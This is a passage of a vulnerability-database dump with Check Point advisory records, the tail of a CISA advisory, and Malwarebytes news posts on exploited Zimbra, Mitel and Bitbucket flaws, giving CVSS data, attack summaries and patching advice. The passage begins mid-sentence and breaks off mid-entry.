otherwise, does not constitute or imply endorsement, recommendation, or favoring.\n\n### References\n\n[[1] CVE-2022-27925 detail](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>)\n\n[[2] Mass exploitation of (un)authenticated Zimbra RCE: CVE-2022-27925](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>)\n\n[[3] CVE-2022-37042 detail](<https://nvd.nist.gov/vuln/detail/CVE-2022-37042>)\n\n[[4] Authentication bypass in MailboxImportServlet vulnerability](<https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/>)\n\n[[5] CVE-2022-30333 detail](<https://nvd.nist.gov/vuln/detail/CVE-2022-30333>)\n\n[[6] UnRAR vulnerability exploited in the wild, likely against Zimbra servers](<https://www.securityweek.com/unrar-vulnerability-exploited-wild-likely-against-zimbra-servers>)\n\n[[7] Zimbra Collaboration Kepler 9.0.0 patch 25 GA release](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25>)\n\n[[8] Zimbra UnRAR path traversal](<https://packetstormsecurity.com/files/167989/Zimbra-UnRAR-Path-Traversal.html>)\n\n[[9] Operation EmailThief: Active exploitation of zero-day XSS vulnerability in Zimbra](<https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/>)\n\n[[10] Hotfix available 5 Feb for zero-day exploit vulnerability in Zimbra 8.8.15](<https://blog.zimbra.com/2022/02/hotfix-available-5-feb-for-zero-day-exploit-vulnerability-in-zimbra-8-8-15/>)\n\n### Revisions\n\nAugust 16, 2022: Initial Version|August 22, 2022: Added Snort Signatures|August 23, 2022: Updated Detection Methods Snort Signatures|October 19, 2022: Added new Malware Analysis Report|November 10, 2022: Added new Malware Analysis Report\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-27T12:00:00", "type": "ics", "title": "Threat Actors Exploiting Multiple CVEs Against Zimbra Collaboration Suite", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24682", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-3033", "CVE-2022-30333", "CVE-2022-37042", "CVE-2023-27350"], "modified": "2023-01-27T12:00:00", "id": "AA22-228A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-228a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-08-17T05:59:07", "description": "A Directory Traversal vulnerability exists in Zimbra Collaboration. Successful exploitation of this vulnerability could allow a remote attacker to disclose or access arbitrary files on the vulnerable server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-16T00:00:00", "type": "checkpoint_advisories", "title": "Zimbra Collaboration Directory Traversal (CVE-2022-27925; CVE-2022-37042)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-16T00:00:00", "id": "CPAI-2022-0515", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-06-27T09:59:56", "description": "A command injection vulnerability exists in Mitel MiVoice Connect. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-27T00:00:00", "type": "checkpoint_advisories", "title": "Mitel MiVoice Connect Command Injection (CVE-2022-29499)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-06-27T00:00:00", "id": "CPAI-2022-0331", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T23:29:47", "description": "A hardcoded credentials vulnerability exists in Atlassian Questions for Confluence App. Successful exploitation of this vulnerability would allow remote attackers to obtain sensitive information and gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-08T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Questions for Confluence App Hardcoded Credentials (CVE-2022-26138)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-08-10T00:00:00", "id": "CPAI-2022-0467", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-20T19:05:33", "description": "A CRLF injection vulnerability exists in Zimbra Collaboration. Successful exploitation of this vulnerability could allow a remote attacker to damage users system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-20T00:00:00", "type": "checkpoint_advisories", "title": "Zimbra Collaboration CRLF Injection (CVE-2022-27924)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-07-20T00:00:00", "id": "CPAI-2022-0357", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-10-31T18:02:15", "description": "A command injection vulnerability exists in Atlassian Bitbucket. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-31T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Bitbucket Command Injection (CVE-2022-36804)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2022-10-31T00:00:00", "id": "CPAI-2022-0615", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-02-16T19:32:54", "description": "An arbitrary file upload vulnerability exists in VMWare vCenter Server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-27T00:00:00", "type": "checkpoint_advisories", "title": "VMWare vCenter Server Arbitrary File Upload (CVE-2021-22005)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T00:00:00", "id": "CPAI-2021-0728", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2022-08-18T00:02:01", "description": "Researchers at [Volexity](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) have discovered that a known vulnerability has been used in a large scale attack against Zimbra Collaboration Suite (ZCS) email servers. But the vulnerability was supposed to be hard to exploit since it required authentication. So they decided to dig deeper.\n\n## An incomplete fix\n\nZimbra is a brand owned by [Synacor](<https://synacor.com/about-us>). Zimbra Collaboration, formerly known as the Zimbra Collaboration Suite (ZCS) is a collaborative software suite that includes an email server and a web client. It is widely used across different industries and government organizations. We reported about a cross-site scripting (XSS) [zero-day vulnerability in the Zimbra email platform](<https://www.malwarebytes.com/blog/news/2022/02/threat-actor-steals-email-with-zimbra-zero-day>) back in February 2022. At the time, Zimbra claimed there were 200,000 businesses, and over a thousand government and financial institutions, using its software.\n\nThe initial investigations showed evidence indicating the likely cause of these breaches was exploitation of [CVE-2022-27925](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27925>), a remote-code-execution (RCE) vulnerability in ZCS. This vulnerability was patched by Zimbra in March 2022.\n\nThe description of the CVE informs us that Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has _mboximport_ functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.\n\nZimbra patched the vulnerability, but, in the company's own words, it would turn out to be an \"incomplete fix for CVE-2022-27925\".\n\n## Mass exploitation\n\nIt is uncommon for a vulnerability that requires administrator rights to be used in a large-scale attack. Firstly, because it is usually a lot of work for a cybercriminal to obtain valid administrator credentials. But also because once they have administrator credentials there are a lot more options open to them. Although in this case, uploading zip files that will be auto-magically extracted sounds like a good way to establish a foothold.\n\nSo how did it come about that a serious, yet hard to exploit vulnerability got involved in a larger attack rather than a targeted one? The researchers did a lot of digging and found that the threat actors were chaining the known vulnerability with a zero-day path traversal vulnerability. The authentication bypass vulnerability was assigned [CVE-2022-37042](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37042>) after sharing their findings with Zimbra. A path traversal vulnerability allows an attacker to access files on your web server to which they should not have access.\n\nThe underlying problems was that the authentication check, after sending an error message to the unauthenticated attacker, continued executing the subsequent code. So, even though the attackers received an error message the web shell was planted on the server anyway. These web shells were a malicious script used by the attacker with the intent to escalate and maintain persistent access. In other words, a backdoor.\n\nKnowing the paths to which the attacker had installed web shells, and the behavior of ZCS when contacting a URL that did not exist, the researchers performed a scan of ZCS instances in the wild to identify third-party compromises using the same web shell names. This scan yielded over 1,000 infected ZCS instances worldwide. The real number of infected instances is probably a lot higher since the scan only looked for shell paths known to the researchers.\n\n## Mitigation\n\nZimbra has patched the authentication issue in its [9.0.0P26](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P26>) and [8.8.15P33](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P33>) releases. If you were late to patch for the RCE vulnerability, you should assume that your server instance has been compromised.\n\nIn order to verify the presence of web shells on a ZCS instance, one technique that can be used is to compare the list of JSP files on a Zimbra instance with those present by default in Zimbra installations. Lists of valid JSP files included in Zimbra installations can be found [on GitHub](<https://github.com/volexity/threat-intel/tree/main/2022/2022-08-10%20Mass%20exploitation%20of%20\$Un\$authenticated%20Zimbra%20RCE%20CVE-2022-27925>) for the latest version of 8.8.15 and of 9.0.0.\n\n## Update August 17, 2022\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) hace published a joint [Cybersecurity Advisory (CSA)](<https://www.cisa.gov/uscert/sites/default/files/publications/aa22-228a-threat-actors-exploiting-multiple-cves-against-zimbra.pdf>) in response to the active exploitation of the vulnerabilities in the Zimbra Collaboration Suite (ZCS).\n\nStay safe, everyone!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-11T13:00:00", "type": "malwarebytes", "title": "[updated] Thousands of Zimbra mail servers backdoored in large scale attack", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-11T13:00:00", "id": "MALWAREBYTES:FD1933FDD45B339A42C8A69C46589A0D", "href": "https://www.malwarebytes.com/blog/news/2022/08/thousands-of-zimbra-mail-servers-backdoored-in-large-scale-attack", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-01-16T00:11:16", "description": "Ransomware gangs have shown that they can play a long game, so it shouldn't come as a surprise to learn of one prepared to wait months to make use of a compromised system.\n\nS-RM's Incident Response team [shared details](<https://insights.s-rminform.com/lorenz-cyber-intelligence-briefing-special>) of a campaign attributed to the Lorenz ransomware group that exploited a specific vulnerability to plant a backdoor that wasn't used until months later.\n\n## Lorenz\n\nThe Lorenz ransomware group first appeared on the radar in 2021. They have targeted organizations all over the world and are known to specialize in VoIP vulnerabilities to access their victims' environments. Like many ransomware groups, they steal their victim's data before encrypting it, so they can add the threat of leaked data to the threat of encryption making it irrecoverable.\n\n## Vulnerability\n\nThe researchers found in a specific case that the Lorenz group was able to exploit a vulnerability listed as [CVE-2022-29499](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29499>) a week prior to it being patched. This vulnerability, which has a CVSS score of 9.8 out of 10, exists in the Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 and allows remote code execution because of incorrect data validation. Essentially the vulnerability allowed an unauthenticated remote attacker to send specially crafted requests to inject commands and achieve remote code execution.\n\n## Exploited\n\nAfter a vulnerability has been [discovered](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>) and [patched](<https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-22-0002>), it is not uncommon for organizations to wait for a convenient moment to apply the patch. But as soon as a patch is made available threat actors have the opportunity to reverse engineer it, find the vulnerability, create an exploit, and then scan for vulnerable systems. Its exactly this window of opportunity that the Lorenz ransomware group managed to exploit, in order to install a web shell on the vulnerable system. This web shell has a unique name and requires credentials to access the system.\n\nThe shell was placed some five months before the actual ransomware event, and sat dormant throughout that period. Whether the backdoor was created by an [Initial Access Broker (IAB)](<https://www.malwarebytes.com/blog/business/2022/11/initial-access-brokers-iabs-3-ways-they-break-into-corporate-networks-and-how-to-detect-them>) and then sold on to the ransomware group or whether the Lorenz group created it themselves is unknown. But the results is the same.\n\n## Why wait?\n\nThe time between the compromise and the deployment of the ransomware can be explained by several theories.\n\n * The backdoor was planted by an IAB that waited for the right offer to sell off their access to the compromised system.\n * When an easy to exploit vulnerability is available, a group will first compromise as many systems as possible and later work their way through the list of victims.\n * With the initial breach the threat actor replaced several key artefacts on the perimeter CentOS system, effectively blocking the creation of any additional logging or audit data. After a while old logs will be deleted and no new ones are created, which improves the attacker's chances of going in undetected.\n\n## Patching\n\nBesides showing us how important it is to [patch in a timely fashion](<https://www.malwarebytes.com/business/vulnerability-patch-management>), this vulnerability has shown us that patching alone is not always enough.\n\nVictims were made with this vulnerability before there was a patch available. The vulnerability was found by investigating a suspected ransomware intrusion attempt, so there was at least one group that was able to use the vulnerability when it was still a [zero-day](<https://www.malwarebytes.com/glossary/zero-day>).\n\nThe exploit details were published in June and the victim patched in July but was compromised a week prior to patching. So, the backdoor was planted during the time between the patch being released and it actually getting installed, the so called \"patch gap\".\n\n## Monitoring\n\nSo, what else do we need to do in case we patch a vulnerable system? A difficult question with no easy cure-all answer. But there are some pieces of advice we can give:\n\n * Keep the patch gap as small as possible. We know it's not easy, but it helps a lot.\n * Check vulnerable devices before and after patching for indicators of compromise (IOCs). They may not always be available, but when it concerns a vulnerability that's known to have been exploited you may be able to find the IOCs or figure out where to look.\n * Constant monitoring. If you didn't find the backdoor, make sure you have the capabilities to find the tools threat actors use for lateral movement, and block the final payload (ransomware in this case).\n * Look for unauthorized access or atypical behavior originating from the recently patched device/system.\n\n* * *\n\n**We don't just report on threats--we remove them**\n\nCybersecurity risks should never spread beyond a headline. Keep threats off your devices by [downloading Malwarebytes today](<https://www.malwarebytes.com/for-home>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-15T18:45:00", "type": "malwarebytes", "title": "Timely patching is good, but sometimes it's not enough", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2023-01-15T18:45:00", "id": "MALWAREBYTES:58E222D9BD3FC1273D169FE26CA6D804", "href": "https://www.malwarebytes.com/blog/news/2023/01/timely-patching-is-good-but-does-not-provide-full-ransomware-protection", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-04T00:04:30", "description": "On September 29, 2022 the Cybersecurity & Infrastructure Security Agency (CISA) added three vulnerabilities to the [catalog of known to be exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). One of them is [a vulnerability in Atlassian's Bitbucket Server and Data Center](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/23/cisa-has-added-one-known-exploited-vulnerability-catalog>). The other two are the [Exchange Server zero-day vulnerabilities](<https://www.malwarebytes.com/blog/news/2022/09/two-new-exchange-zero-days-that-look-and-feel-like-proxyshell-part-2>) we wrote about last week.\n\nThe Bitbucket vulnerability is no zero-day. Fixed versions were made available on August 24, 2022. The vulnerability allows an attacker who has read permissions to execute arbitrary code by sending a malicious HTTP request.\n\n## Mitigation\n\nAll versions of Bitbucket Server and Datacenter released after 6.10.17 including 7.0.0 and newer are affected. Atlassian recommends that you upgrade your instance to one of the versions listed below.\n\n**Supported Version**\n\n| \n\n**Bug Fix Release** \n \n---|--- \n \n[Bitbucket Server and Data Center 7.6](<https://confluence.atlassian.com/bitbucketserver/bitbucket-server-7-6-release-notes-1018780800.html>)\n\n| \n\n7.6.17 ([LTS](<https://confluence.atlassian.com/enterprise/long-term-support-releases-948227420.html>)) or newer \n \n[Bitbucket Server and Data Center 7.17](<https://confluence.atlassian.com/bitbucketserver/bitbucket-data-center-and-server-7-17-release-notes-1086401305.html>)\n\n| \n\n7.17.10 ([LTS](<https://confluence.atlassian.com/enterprise/long-term-support-releases-948227420.html>)) or newer \n \n[Bitbucket Server and Data Center 7.21](<https://confluence.atlassian.com/bitbucketserver/bitbucket-data-center-and-server-7-21-release-notes-1115129015.html>)\n\n| \n\n7.21.4 ([LTS](<https://confluence.atlassian.com/enterprise/long-term-support-releases-948227420.html>)) or newer \n \n[Bitbucket Server and Data Center 8.0](<https://confluence.atlassian.com/bitbucketserver/bitbucket-data-center-and-server-8-0-release-notes-1115659343.html>)\n\n| \n\n8.0.3 or newer \n \n[Bitbucket Server and Data Center 8.1](<https://confluence.atlassian.com/bitbucketserver/bitbucket-data-center-and-server-8-1-release-notes-1130726463.html>)\n\n| \n\n8.1.3 or newer \n \n[Bitbucket Server and Data Center 8.2](<https://confluence.atlassian.com/bitbucketserver/bitbucket-data-center-and-server-8-2-release-notes-1130729887.html>)\n\n| \n\n8.2.2 or newer \n \n[Bitbucket Server and Data Center 8.3](<https://confluence.atlassian.com/bitbucketserver/bitbucket-data-center-and-server-8-3-release-notes-1141987753.html>)\n\n| \n\n8.3.1 or newer \n \nYou can download the latest version of Bitbucket from the [download center](<https://www.atlassian.com/software/bitbucket/download-archives>). Visit [the Frequently Asked Questions (FAQ)](<https://confluence.atlassian.com/kb/faq-for-cve-2022-36804-1157481722.html>) page if you have any questions.\n\nIf, for any reason, you are unable to apply the security updates, you are advised to apply temporary partial mitigation by turning off public repositories by setting the option feature.public.access to false. This blocks unauthorized users from accessing the repository.\n\nIf you access Bitbucket via a bitbucket.org domain, it is hosted by Atlassian and you are not affected by the vulnerability.\n\n## Vulnerability\n\nThe Remote Code Execution vulnerability was found by [Maxwell Garret](<https://twitter.com/TheGrandPew>) a security researcher at [Assetnote](<https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/>) and assigned [CVE-2022-36804](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804>). The vulnerability was rated as critical, which indicates a [CVSS score](<https://www.malwarebytes.com/blog/news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities>) between 9 and 10 out of 10. If an attacker can read the content of a repository, either because it is a public repository or because they have read permission on a private repository, they are able to exploit the vulnerability.\n\n## Discovery\n\nBitbucket is a web based hosting service that distributes source code and development projects. Typically, Bitbucket Server is deployed on-premise and allows uploads of source code from GitHub and other platforms. Bitbucket uses git for many operations within the software. The discovery was inspired by the blog post from William Bowling about his [RCE via git option injection in GitHub Enterprise](<https://devcraft.io/2020/10/18/github-rce-git-inject.html>).\n\n## Exploitation\n\nThe proof-of-concept (PoC) exploit was made [public](<https://twitter.com/TheGrandPew/status/1571847052962975745>) on September 19, 2022. Attackers did not wait long. Some were [observed scanning](<https://twitter.com/Balgan/status/1573363247239278594>) for vulnerable instances as early as September 20th.\n\nBesides CISA adding the vulnerability to the known to be exploited vulnerabilities list, the Belgian federal cyber emergency team (CERT.be) warned that an exploit kit is now available for CVE-2022-36804 and urged users to patch.\n\n> WARNING: An exploit kit is now available for CVE-2022-36804 affecting [@Atlassian](<https://twitter.com/Atlassian?ref_src=twsrc%5Etfw>) [@Bitbucket](<https://twitter.com/Bitbucket?ref_src=twsrc%5Etfw>) Server and Data Center. More information on <https://t.co/ccK9ng8j58> \nIf you haven't done so already, it's time to [#patch](<https://twitter.com/hashtag/patch?src=hash&ref_src=twsrc%5Etfw>) [#patch](<https://twitter.com/hashtag/patch?src=hash&ref_src=twsrc%5Etfw>) [#patch](<https://twitter.com/hashtag/patch?src=hash&ref_src=twsrc%5Etfw>) <https://t.co/fytm6ZEGiw>\n> \n> -- CERT.be (@certbe) [September 27, 2022](<https://twitter.com/certbe/status/1574758255032680450?ref_src=twsrc%5Etfw>)\n\nNow that CISA has set a to-be-patched date of October 21, 2022 this will put the vulnerability higher on the agenda for US Federal Civilian Executive Branch Agencies (FCEB) agencies. As always, all other organizations are under advice to [patch](<https://www.malwarebytes.com/business/vulnerability-patch-management>) urgently if they haven't already.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T12:00:00", "type": "malwarebytes", "title": "Actively exploited vulnerability in Bitbucket Server and Data Center", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2022-10-03T12:00:00", "id": "MALWAREBYTES:DCC5A065F75E0F7E276C99A5D4F5979C", "href": "https://www.malwarebytes.com/blog/news/2022/10/warnings-about-actively-exploited-vulnerability-in-bitbucket-server-and-data-center", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-28T20:35:10", "description": "### Last week on Malwarebytes Labs\n\n * Freedom Hosting operator [gets 27 years](<https://blog.malwarebytes.com/cybercrime/2021/09/freedom-hosting-operator-gets-27-years-for-hosting-dark-web-child-abuse-sites/>) for hosting dark web abuse sites\n * Microsoft makes a [bold move](<https://blog.malwarebytes.com/opinion/2021/09/microsoft-makes-a-bold-move-towards-a-password-less-future/>) towards a password-less future\n * New Mac malware masquerades as [iTerm2, remote desktop and other apps](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/new-mac-malware-masquerades-as-iterm2-remote-desktop-and-other-apps/>)\n * Internet safety tips for kids and teens: a [comprehensive guide](<https://blog.malwarebytes.com/how-tos-2/2021/09/internet-safety-tips-for-kids-and-teens-a-comprehensive-guide-for-the-modern-parent/>) for the modern parent\n * Google, geofence warrants, [and you](<https://blog.malwarebytes.com/privacy-2/2021/09/google-geofence-warrants-and-you/>)\n * No, Colonel Gaddafi\u2019s daughter isn\u2019t [emailing to give you untold riches](<https://blog.malwarebytes.com/social-engineering/2021/09/no-colonel-gaddafis-daughter-isnt-emailing-to-give-you-untold-riches/>)\n * Patch vCenter Server \u201c[right 